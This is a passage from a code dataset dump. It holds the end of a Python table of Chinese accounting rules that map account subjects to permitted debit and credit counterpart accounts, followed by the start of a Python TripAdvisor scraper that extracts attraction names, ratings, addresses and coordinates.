{\"opposite\":monetary_funds,\"event\":\"收到股东投资款-货币出资\",\"problem\":None},\n {\"opposite\":[\"原材料\",\"库存商品\",\"产成品\",\"低值易耗品\",\"固定资产\",\"应交税费\"],\"event\":\"收到股东投资款-非货币出资\",\"problem\":None},\n {\"opposite\":[\"资本公积\"],\"event\":\"资本公积转增股本\",\"problem\":None},\n ]},\n{\"no\":34,\"subject\":\"资本公积\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"资本公积减少\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"资本公积增加\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"应收股利\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"确认应收股利\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"收回应收股利\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"发出商品\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"原材料\",\"库存商品\",\"产成品\"] , \"event\": \"结转发出商品\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"发出商品结转至成本\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"自制半成品\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"生产成本\"] , \"event\": \"自制半成品入库\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"生产成本\"],\"event\":\"领用自制半成品用于生产\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"原材料\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入原材料\", \"problem\": None},\n {\"opposite\":[\"其他应付款\"] , \"event\": \"购入原材料-贷方为其他应付款\", \"problem\": \"购入原材料-贷方为其他应付款\"},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转原材料\", \"problem\": None},\n {\"opposite\":[\"委托加工物资\",\"应付账款\",\"物资采购\",\"材料采购\"] , \"event\": \"委托加工物资结转原材料\", \"problem\": None},\n {\"opposite\":[\"生产成本\"] , \"event\": \"自制原材料\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售原材料结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用原材料用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用原材料用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领料用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领料用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领料用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领料用于委外加工\",\"problem\":None},\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\",\"管理费用\",\"销售费用\",\"研发费用\",\n \"制造费用\",\"生产成本\",\"在建工程\",\"委托加工物资\",\"开发支出\",\"营业外支出\"],\"event\":\"领用原材料\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"材料采购\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\"] , \"event\": \"材料采购转入应付账款\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"材料采购增加\",\"problem\":\"材料采购增加\"},\n ]},\n{\"no\":35,\"subject\":\"物资采购\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\"] , \"event\": \"物资采购转入应付账款\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"物资采购增加\",\"problem\":\"物资采购增加\"},\n ]},\n{\"no\":35,\"subject\":\"低值易耗品\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入低值易耗品\", \"problem\": None},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转低值易耗品\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n 
\"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售低值易耗品结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用值易耗品用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用低值易耗品用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领低值易耗品用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领低值易耗品用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领低值易耗品用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领低值易耗品用于委外加工\",\"problem\":None},\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\",\"管理费用\",\"销售费用\",\"研发费用\",\n \"制造费用\",\"生产成本\",\"在建工程\",\"委托加工物资\",\"开发支出\",\"营业外支出\"],\"event\":\"领用低值易耗品\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"周转材料\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入周转材料\", \"problem\": None},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转周转材料\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售周转材料结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用值易耗品用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用周转材料用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领��转材料用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领周转材料用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领周转材料用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领周转材料用于委外加工\",\"problem\":None},\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\",\"管理费用\",\"销售费用\",\"研发费用\",\n \"制造费用\",\"生产成本\",\"在建工程\",\"委托加工物资\",\"开发支出\",\"营业外支出\"],\"event\":\"领用周转材料\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"包装物\",\"debit_only_one\":False,\n\"debit\":[\n{\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入包装物\", \"problem\": None},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转包装物\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售包装物结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用包装物用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用包装物用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领包装物用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领包装物用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领包装物用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领包装物用于委外加工\",\"problem\":None},\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\",\"管理费用\",\"销售费用\",\"研发费用\",\n \"制造费用\",\"生产成本\",\"在建工程\",\"委托加工物资\",\"开发支出\",\"营业外支出\"],\"event\":\"领用包装物\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"包装物及低值易耗品\",\"debit_only_one\":False,\n\"debit\":[\n{\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入包装物及低值易耗品\", \"problem\": None},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转包装物及低值易耗品\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售包装物及低值易耗品结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用包装物及低值易耗品用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用包装物及低值易耗品用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领包装物及低值易耗品用于生产\",\"problem\":None},\n # 
{\"opposite\":[\"在建工程\"],\"event\":\"领包装物及低值易耗品用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领包装物及低值易耗品用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领包装物及低值易耗品用于委外加工\",\"problem\":None},\n {\"opposite\":[\"主营业务成本\",\"其他业务成本\",\"管理费用\",\"销售费用\",\"研发费用\",\n \"制造费用\",\"生产成本\",\"在建工程\",\"委托加工物资\",\"开发支出\",\"营业外支出\"],\"event\":\"领用包装物及低值易耗品\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"库存商品\",\"debit_only_one\":False,\n\"debit\":[\n{\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"库存现金\",\"银行存款\",\"物资采购\",\"材料采购\"] , \"event\": \"购入库存商品\", \"problem\": None},\n {\"opposite\":[\"在途物资\"] , \"event\": \"在途物资结转库存商品\", \"problem\": None},\n {\"opposite\":[\"委托加工物资\",\"应付账款\",\"预付账款\",\"其他应收款\",\"其他应付款\"] , \"event\": \"委托加工物资结转库存商品\", \"problem\": None},\n {\"opposite\":[\"生产成本\"] , \"event\": \"自制库存商品\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"销售库存商品结转至成本\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用库存商品用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用库存商品用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"生产成本\"],\"event\":\"领用库存商品用于生产\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领用库存商品用于在建工程\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领用库存商品用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领用库存商品用于委外加工\",\"problem\":None},\n {\"opposite\": [\"主营业务成本\", \"其他业务成本\", \"管理费用\", \"销售费用\", \"研发费用\",\n \"制造费用\", \"生产成本\", \"在建工程\", \"委托加工物资\", \"开发支出\",\"营业外支出\"], \"event\": \"领用库存商品\", \"problem\": None},\n ]},\n{\"no\":35,\"subject\":\"产成品\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"生产成本\"] , \"event\": \"生产产成品入库\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n # {\"opposite\":[\"主营业务成本\",\"其他业务成本\"],\"event\":\"产成品销售结转成本\",\"problem\":None},\n # {\"opposite\":[\"在建工程\"],\"event\":\"领用产成品于在建工程\",\"problem\":None},\n # {\"opposite\":[\"管理费用\",\"销售费用\",\"研发费用\"],\"event\":\"领用产成品用于费用\",\"problem\":None},\n # {\"opposite\":[\"制造费用\"],\"event\":\"领用产成品用于制造费用\",\"problem\":None},\n # {\"opposite\":[\"开发支出\"],\"event\":\"领用产成品用于开发支出\",\"problem\":None},\n # {\"opposite\":[\"委托加工物资\"],\"event\":\"领用产成品用于委外加工\",\"problem\":None},\n {\"opposite\": [\"主营业务成本\", \"其他业务成本\", \"管理费用\", \"销售费用\", \"研发费用\",\n \"制造费用\", \"生产成本\", \"在建工程\", \"委托加工物资\", \"开发支出\",\"营业外支出\"], \"event\": \"领用产成品\", \"problem\": None},\n ]},\n{\"no\":35,\"subject\":\"委托加工物资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"应付账款\", \"预付款项\", \"应付票据\", \"其他应收款\", \"其他应付款\", \"库存现金\", \"银行存款\"], \"event\": \"付现委外加工费用\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"委托加工物资减少\",\"problem\":\"委托加工物资减少\",},\n ]},\n{\"no\":35,\"subject\":\"生产成本\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应付账款\",\"预付款项\",\"应付票据\",\"其他应收款\",\"其他应付款\",\"库存现金\",\"银行存款\"] , \"event\": \"付现生产成本\", \"problem\": None},\n {\"opposite\":[\"制造费用\"] , \"event\": \"制造费用结转生产成本\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\": \"all\", \"event\": \"生产成本减少\", \"problem\": \"生产成本减少\", },\n ]},\n{\"no\":35,\"subject\":\"制造费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"库存现金\",\"银行存款\",\"应付账款\",\"预付款项\",\"其他应收款\",\"其他应付款\",\"应付票据\"] , \"event\": \"付现制造费用\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\": \"all\", 
\"event\": \"制造费用减少\", \"problem\": \"制造费用减少\", },\n ]},\n{\"no\":35,\"subject\":\"在建工程\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"在建工程增加\", \"problem\": \"在建工程增加\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"应交税费\"],\"event\":\"在建工程进项税冲减在建工程原值\",\"problem\":\"在建工程进项税冲减在建工程原值\"},\n {\"opposite\":\"all\",\"event\":\"在建工程减少\",\"problem\":\"在建工程减少\"},\n ]},\n{\"no\":35,\"subject\":\"工程物资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"应付账款\",\"其他应付款\",\"长期应付款\",\"库存现金\",\"银行存款\"], \"event\": \"购买工程物资\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"工程物资减少\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"销售费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"费用增加-销售费用增加\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减销售费用\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"管理费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"费用增加-管理费用增加\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减管理费用\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"研发费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"费用增加-研发费用增加\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减研发费用\",\"problem\":None},\n ]},\n{\"no\":35,\"subject\":\"应交税费\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付应交税费\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"应交税费增加\",\"problem\":\"应交税费增加\"},\n ],\n \"two_way\":[\n {\"keywords\": [\"未交增值税\"], \"contain_event\": \"未交增值税结转\", \"problem\": None},\n ]\n },\n{\"no\":36,\"subject\":\"应付账款\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付应付账款\", \"problem\": None},\n {\"opposite\": [\"预付款项\"], \"event\": \"应付账款与预付账款对冲\", \"problem\": None},\n {\"opposite\": [\"其他应付款\"], \"event\": \"应付账款转入其他应付款\", \"problem\": None},\n {\"opposite\": [\"其他应收款\"], \"event\": \"应付账款与其他应收款对冲\", \"problem\": None},\n {\"opposite\": [\"应付票据\"], \"event\": \"应付账款转入应付票据\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"应付账款增加\",\"problem\":\"应付账款增加\"},\n ]},\n{\"no\":36,\"subject\":\"预付款项\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付预付款\", \"problem\": None},\n {\"opposite\": [\"其他应收款\"], \"event\": \"预付账款转入其他应收款\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"预付账款减少\",\"problem\":\"预付账款减少\"},\n ]},\n{\"no\":36,\"subject\":\"应付票据\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付应付票据\", \"problem\": None},\n {\"opposite\": [\"预付款项\"], \"event\": \"应付票据与预付账款对冲\", \"problem\": None},\n {\"opposite\": [\"其他应付款\"], \"event\": \"应付票据转入其他应付款\", \"problem\": None},\n {\"opposite\": [\"其他应收款\"], \"event\": \"应付票据与其他应收款对冲\", \"problem\": None},\n {\"opposite\": [\"应付账款\"], \"event\": \"应付票据转入应付账款\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"应付票据增加\",\"problem\":\"应付票据增加\"},\n ]},\n\n{\"no\":36,\"subject\":\"预付款项\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付预付款\", \"problem\": 
None},\n {\"opposite\": [\"其他应收款\"], \"event\": \"预付账款转入其他应收款\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"预付账款减少\",\"problem\":\"预付账款减少\"},\n ]},\n{\"no\":18,\"subject\":\"其他应收款\",\"debit_only_one\":False,\n\"debit\":\n [\n {\"keywords\": [\"押金\",\"保证金\",\"质保金\",\"履约金\"],\"contain_event\":\"支付押金及保证金\",\"problem\": None},\n {\"keywords\": [\"罚款\",\"赔款\",\"保险赔款\"],\"contain_event\":\"支付罚款及赔款\",\"problem\": None},\n {\"keywords\": [\"备用金\",\"员工借款\"],\"contain_event\":\"支付员工备用金\",\"problem\": None},\n {\"keywords\": [\"代缴\",\"代垫\",\"代付\",\"水电费\",\"医药费\",\"房租费\",\"社保\",\"公积金\",\n \"养老保险\",\"医疗保险\",\"失业保险\",\"工伤保险\",\"生育保险\",\"社会保险\"],\"contain_event\":\"代缴代付款\",\"problem\": None},\n {\"keywords\": [\"公司\",\"厂\",\"往来款\",\"集团内部\",\"内部往来\"],\"contain_event\":\"公司往来款\",\"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"收回其他应收款\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"其他应收款减少\",\"problem\":\"其他应收款减少\"},\n ]\n },\n{\"no\":18,\"subject\":\"其他应付款\",\"debit_only_one\":False,\n\"debit\":\n [\n {\"opposite\": monetary_funds, \"event\": \"支付其他应付款\", \"problem\": None},\n {\"opposite\": \"all\", \"event\": \"其他应付款减少\", \"problem\": \"其他应付款减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"keywords\": [\"押金\", \"保证金\",\"质保金\",\"履约金\"], \"contain_event\": \"收到押金及保证金\", \"problem\": None},\n {\"keywords\": [\"罚款\", \"赔款\", \"保险赔款\"], \"contain_event\": \"收到罚款及赔款\", \"problem\": None},\n {\"keywords\": [ \"代收\", \"水电费\", \"医药费\", \"房租费\", \"社保\", \"公积金\",\n \"养老保险\", \"医疗保险\", \"失业保险\", \"工伤保险\", \"生育保险\", \"社会保险\"], \"contain_event\": \"暂收代付款\", \"problem\": None},\n {\"keywords\": [\"公司\", \"厂\", \"往来款\",\"集团内部\",\"内部往来\"], \"contain_event\": \"公司往来款\", \"problem\": None},\n ]\n },\n{\"no\":36,\"subject\":\"库存现金\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"银行存款\"], \"event\": \"银行提取现金\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"银行存款\"],\"event\":\"现金存银行\",\"problem\":None},\n ]},\n{\"no\":36,\"subject\":\"银行存款\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"银行存款增加\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"银行存款减少\",\"problem\":None},\n ]},\n]\n","sub_path":"settings/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":68017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"462514598","text":"import json\nimport re\nfrom typing import Any, Optional\nfrom urllib.parse import parse_qs, urlparse, ParseResult\n\nfrom shapely.geometry import Point\n\nfrom tripadvisor.browser import Response\n\nURL = 'https://www.tripadvisor.com'\n\n\ndef find_value_nested_dict(key: Any, dct: dict) -> Optional[Any]:\n val1 = dct.get(key, None)\n if val1:\n return val1\n else:\n for k in dct.keys():\n if isinstance(dct[k], dict) and key in dct[k]:\n return dct[k][key]\n return None\n\n\ndef extract_integer(line: str) -> int:\n \"\"\"Extract alle cijfers uit een string.\"\"\"\n if isinstance(line, int):\n return line\n try:\n return int(re.sub(r'[^0-9]', '', line))\n except (TypeError, ValueError, AttributeError):\n return -1\n\n\ndef extract_float(line) -> float:\n if isinstance(line, float):\n return line\n\n elif isinstance(line, int):\n return float(line)\n\n else:\n try:\n return float(re.sub(r'[^0-9.]', '', line.replace(',', '.')))\n except 
(TypeError, ValueError, AttributeError):\n return -1.0\n\n\ndef extract_phonenr(line: str) -> str:\n \"\"\"Extract telefoonnummer uit string.\"\"\"\n return re.sub(r'[^+0-9]', '', line)\n\n\nclass Attractie:\n _response: Response\n\n _xpath_staticmap_element: str = \"//img[contains(@src, 'maps.google')]\"\n _tripadvisor_id: int\n _title: str\n _straat: str\n _postcode: str\n _plaats: str\n _country: str\n _coords: Point\n _rating: float\n _aantal_reviews: int\n _reviews: list\n _link: ParseResult\n\n def __init__(self, link: str, headless: bool = True):\n self.link = link\n self.get_attractie(headless=headless)\n\n def __repr__(self):\n return f\"Titel: {self.title}\\n\" \\\n f\"ID: {self.tripadvisor_id}\\n\" \\\n f\"Rating: {self.rating}\\n\" \\\n f\"Aantal reviews: {self.aantal_reviews}\\n\" \\\n f\"Reviews: {self.reviews}\\n\" \\\n f\"Straat: {self.straat}\\n\" \\\n f\"Land: {self.country}\\n\" \\\n f\"Postcode: {self.postcode}\\n\" \\\n f\"Coordinaten: {self.coords}\"\n\n @property\n def link(self) -> ParseResult:\n return self._link\n\n @link.setter\n def link(self, value: str):\n try:\n link = urlparse(f\"{URL}{value}\")\n\n except (AttributeError, TypeError, ValueError):\n print(f'geen geldige url: {value}')\n self._link = urlparse('')\n\n else:\n self._link = link\n\n @property\n def response(self):\n return self._response\n\n @property\n def title(self) -> str:\n return self._title\n\n @title.setter\n def title(self, value: str):\n self._title = str(value).strip() if value else ''\n\n @property\n def tripadvisor_id(self) -> int:\n return self._tripadvisor_id\n\n @tripadvisor_id.setter\n def tripadvisor_id(self, value: str):\n self._tripadvisor_id = extract_integer(value)\n\n @property\n def rating(self) -> float:\n return self._rating\n\n @rating.setter\n def rating(self, value: str):\n self._rating = extract_float(value)\n\n @property\n def plaats(self) -> str:\n return self._plaats\n\n @plaats.setter\n def plaats(self, value: str):\n self._plaats = value if value else ''\n\n @property\n def straat(self) -> str:\n return self._straat\n\n @straat.setter\n def straat(self, value: str):\n self._straat = value if value else ''\n\n @property\n def postcode(self) -> str:\n return self._postcode\n\n @postcode.setter\n def postcode(self, value: str):\n self._postcode = value if value else ''\n\n @property\n def aantal_reviews(self) -> int:\n return self._aantal_reviews\n\n @aantal_reviews.setter\n def aantal_reviews(self, value: str):\n self._aantal_reviews = extract_integer(value)\n\n @property\n def coords(self) -> Point:\n return self._coords\n\n @coords.setter\n def coords(self, value):\n try:\n lon = extract_float(value[0])\n lat = extract_float(value[1])\n except (IndexError, TypeError):\n lat, lon = -1, -1\n self._coords = Point(lon, lat)\n\n @property\n def country(self) -> str:\n return self._country\n\n @country.setter\n def country(self, value: str):\n self._country = value if value else ''\n\n @property\n def reviews(self) -> list:\n return self._reviews\n\n @reviews.setter\n def reviews(self, value):\n self._reviews = [extract_integer(r.string) for r in value] if value else [-1] * 5\n\n @property\n def data(self) -> tuple:\n attrac = (\n 'NEW',\n self.title,\n self.link.path,\n self.tripadvisor_id,\n self.rating,\n self.straat,\n self.postcode,\n self.plaats,\n self.country,\n self.aantal_reviews,\n *self.reviews,\n self.coords.x,\n self.coords.y\n )\n if len(attrac) != 17:\n print('Warning: attractie != 17')\n\n self.print_()\n return attrac\n\n def print_(self):\n print(\n 
f\"Attractie(titel={self.title}, \"\n f\"id={self.tripadvisor_id}, \"\n f\"rating={self.rating}, \"\n f\"aantal_reviews={self.aantal_reviews}, \"\n f\"coord={self.coords}, \"\n f\"link={self.link.path})\"\n )\n\n def from_link(self, headless: bool = True):\n self._response = Response(self.link.geturl(), headless=headless, init=True)\n\n wait = [\n (self._xpath_staticmap_element, 0.1), # works: 1, 0.5\n (\"//span[@class='_82HNRypW']\", 0.1) # works: 0.5, 0.25\n ]\n self.response.get_response(wait_for_elements=wait)\n self.response.create_soup()\n\n def find_details_in_script_header(self, key: Any) -> dict:\n try:\n script = self.response.soup.find('script', {'type': 'application/ld+json'})\n value = find_value_nested_dict(key, json.loads(script.string)) or {}\n\n except (TypeError, AttributeError):\n return {}\n\n return value\n\n def find_title(self):\n title = self.find_details_in_script_header('name')\n\n if not title:\n try:\n title = self.response.soup.find('span', {'class': 'IKwHbf8J'}).get_text(strip=True)\n except AttributeError:\n pass\n\n self.title = title\n\n def find_ta_id(self):\n try:\n res = re.search(\n r'^/[\\w]+-g([0-9]+)-d([0-9]+)',\n self.link.path,\n re.IGNORECASE\n ).group(2)\n\n except (AttributeError, ValueError, TypeError):\n self.tripadvisor_id = -1\n\n else:\n self.tripadvisor_id = res\n\n def find_rating(self):\n if self.aantal_reviews == -1: # Geen reviews, geen rating.\n rating = None\n\n else:\n rating = self.find_details_in_script_header('ratingValue')\n\n if not rating:\n try:\n content = self.response.get_css_properties(\n elem=[\"span.uq1qMUbD._2n4wJlqY\", \"span.uq1qMUbD._2vB__cbb\"],\n by='css',\n prop=\"content\",\n pseudo=':after'\n )\n full = [repr(f).count(\"\\\\ue129\") for f in content]\n half = [repr(h).count(\"\\\\ue12a\") * 5 for h in content] # 0 of 1\n rating = f'{min(full)}.{max(half)}'\n\n except (TypeError, ValueError):\n # min/max throw valueerror on empty list\n rating = None\n\n self.rating = rating\n\n def find_aantal_reviews(self):\n aantal_reviews = self.find_details_in_script_header('reviewCount')\n\n if not aantal_reviews:\n try:\n aantal_reviews = self.response.soup.find('span', {'class': '_82HNRypW'}).get_text()\n except AttributeError:\n pass\n\n self.aantal_reviews = aantal_reviews\n\n def find_adres_straat(self):\n self.straat = self.find_details_in_script_header('streetAddress')\n\n def find_postcode(self):\n self.postcode = self.find_details_in_script_header('postalCode')\n\n def find_plaats(self):\n self.plaats = self.find_details_in_script_header('addressLocality')\n\n def find_country(self):\n coun = self.find_details_in_script_header('addressCountry')\n self.country = coun.get('name', None)\n\n def find_coords(self):\n def find_map(x):\n return str(x).startswith('https://maps')\n\n # [i['src'] for i in self.response.soup.find_all('img') if 'src' in i.attrs]\n try:\n coords = self.response.soup.find('img', {'src': find_map})\n\n if coords:\n coords = coords.get('src', None)\n\n else:\n imgs = [i['src'] for i in self.response.soup.find_all('img')\n if 'src' in i.attrs and i.get('src', '').startswith('/data/1.0/maps')]\n coords = urlparse(imgs[0]).query if imgs else None\n\n coords = parse_qs(coords)['center']\n coords = str(coords).split(',')\n\n except (AttributeError, IndexError, TypeError, KeyError, ValueError):\n self.coords = None\n\n else:\n self.coords = coords\n\n def find_reviews(self):\n try:\n soup = self.response.soup\n reviews = soup.find_all(\n 'span', {'class': 
